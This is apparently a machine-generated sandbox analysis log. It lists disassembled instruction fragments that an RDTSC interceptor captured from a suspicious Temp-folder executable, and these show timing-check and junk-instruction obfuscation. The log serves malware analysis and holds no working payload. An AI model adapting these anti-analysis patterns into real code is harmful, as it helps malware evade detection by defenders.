Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D516 second address: 104D538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3FE0C24E66h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D538 second address: 104D53C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D53C second address: 104D542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D542 second address: 104D563 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F3FE11BFDD1h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D563 second address: 104D569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D569 second address: 104D56F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D56F second address: 104D5F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000003h 0x0000000b jmp 00007F3FE0C24E5Fh 0x00000010 mov ecx, dword ptr [ebp+122D3B2Bh] 0x00000016 push 00000000h 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F3FE0C24E58h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 call 00007F3FE0C24E5Ch 0x00000039 jmp 00007F3FE0C24E5Fh 0x0000003e pop edx 0x0000003f push BB6F222Fh 0x00000044 jmp 00007F3FE0C24E5Fh 0x00000049 xor dword ptr [esp], 7B6F222Fh 0x00000050 mov dh, D2h 0x00000052 lea ebx, dword ptr [ebp+12441FB5h] 0x00000058 add esi, 131E8672h 0x0000005e xchg eax, ebx 0x0000005f pushad 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D5F9 second address: 104D634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE11BFDD8h 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F3FE11BFDD2h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D634 second address: 104D63A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 104D63A second address: 104D640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 105F9F8 second address: 105F9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 105F9FC second address: 105FA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106D929 second address: 106D94F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F3FE0C24E68h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F3FE0C24E5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106DC28 second address: 106DC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F3FE11BFDCDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106DC40 second address: 106DC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3FE0C24E56h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106DC4A second address: 106DC4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106DEB9 second address: 106DEFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E67h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F3FE0C24E5Ch 0x00000011 ja 00007F3FE0C24E62h 0x00000017 popad 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106DEFA second address: 106DF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE11BFDD0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106E6E9 second address: 106E709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE0C24E68h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106E709 second address: 106E70D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106E70D second address: 106E713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106E713 second address: 106E719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106E719 second address: 106E71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106EA27 second address: 106EA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 106F50B second address: 106F520 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3FE0C24E56h 0x00000008 jng 00007F3FE0C24E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1075738 second address: 1075742 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3FE11BFDCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1075742 second address: 1075753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jbe 00007F3FE0C24E56h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1075753 second address: 1075759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1075759 second address: 107575D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107575D second address: 1075798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F3FE11BFDCDh 0x00000011 mov eax, dword ptr [eax] 0x00000013 js 00007F3FE11BFDD0h 0x00000019 pushad 0x0000001a jnc 00007F3FE11BFDC6h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jnc 00007F3FE11BFDC6h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1075798 second address: 107579F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1075870 second address: 1075874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1075874 second address: 10758D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F3FE0C24E5Ch 0x0000000f jmp 00007F3FE0C24E5Ch 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007F3FE0C24E5Ch 0x0000001e jp 00007F3FE0C24E56h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F3FE0C24E67h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10758D4 second address: 10758E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10758E3 second address: 1075900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3FE0C24E56h 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jns 00007F3FE0C24E56h 0x00000014 popad 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1075900 second address: 1075904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1075904 second address: 1075908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1075908 second address: 107591D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F3FE11BFDCCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107591D second address: 1075921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107A8E3 second address: 107A8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3FE11BFDC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107A8F2 second address: 107A90F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3FE0C24E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3FE0C24E5Eh 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107A90F second address: 107A92C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pushad 0x00000008 jnp 00007F3FE11BFDC6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jl 00007F3FE11BFDD2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107A92C second address: 107A932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107A932 second address: 107A939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107AC45 second address: 107AC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FE0C24E65h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107B0F1 second address: 107B102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107BAE5 second address: 107BB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3FE0C24E5Ch 0x0000000a popad 0x0000000b push eax 0x0000000c jl 00007F3FE0C24E77h 0x00000012 pushad 0x00000013 jmp 00007F3FE0C24E69h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107BBE8 second address: 107BBF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3FE11BFDC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107BBF2 second address: 107BC11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107BC11 second address: 107BC17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107BC17 second address: 107BC6D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3FE0C24E5Ch 0x00000008 jne 00007F3FE0C24E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 jmp 00007F3FE0C24E65h 0x00000018 jng 00007F3FE0C24E5Ch 0x0000001e jng 00007F3FE0C24E56h 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a jmp 00007F3FE0C24E68h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107BC6D second address: 107BC71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107C8A2 second address: 107C8A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107CAAE second address: 107CAC0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FE11BFDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F3FE11BFDC6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107CC19 second address: 107CC1F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107CC1F second address: 107CC29 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FE11BFDCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107CD68 second address: 107CD93 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3FE0C24E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D19E8h], eax 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3FE0C24E65h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107CD93 second address: 107CD99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107CD99 second address: 107CDAB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F3FE0C24E56h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107CDAB second address: 107CDAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107DA5B second address: 107DA5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107DA5F second address: 107DA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107DA65 second address: 107DA9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3FE0C24E65h 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F3FE0C24E61h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107DA9A second address: 107DAA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107DAA0 second address: 107DAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107FFA7 second address: 107FFBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 10812A2 second address: 10812A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107FFBD second address: 107FFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 107FFC3 second address: 107FFD6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3FE0C24E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1082B96 second address: 1082BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDD8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1083616 second address: 108361B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1082BB2 second address: 1082BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1088C23 second address: 1088C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3FE0C24E60h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1087ED5 second address: 1087EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1087EE4 second address: 1087EFB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3FE0C24E58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007F3FE0C24E64h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
